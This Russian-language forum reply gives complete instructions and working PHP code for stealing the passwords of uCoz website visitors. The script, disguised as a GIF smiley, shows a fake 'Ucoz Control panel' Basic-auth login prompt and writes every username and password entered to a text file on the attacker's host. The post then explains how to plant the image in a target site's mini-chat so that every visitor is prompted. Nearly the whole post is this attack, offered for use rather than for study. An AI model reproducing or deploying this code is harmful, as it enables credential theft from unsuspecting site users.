to NooB MC
Есть такой способ:
Нужно зарегистрировать хост с поддержкой php (например, http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например: passwords.txt (сюда будут присылаться пассы пользователей сайта), и на файл smile.gif. Далее качаем любой смайлик в расширении .gif (типа cool.gif). Потом в блокноте пишем:
Код:
<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
После этого сохраняем файл под названием smile, потом меняем расширение на gif.
Теперь выбираем юкозовский сайт, например http://mysite.ucoz.ru/ потом в мини чате пишем логин, а в содержании сообщения:
[I*MG]http://mysite.phphost.net/smile.gif[/I*MG]
Если после этого в мини чате вместо сообщения появился смайлик - значит сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, будет появляться форма, в которую нужно будет ввести логин и пароль.
Ps: Но этот баг, наверное, уже прикрыли...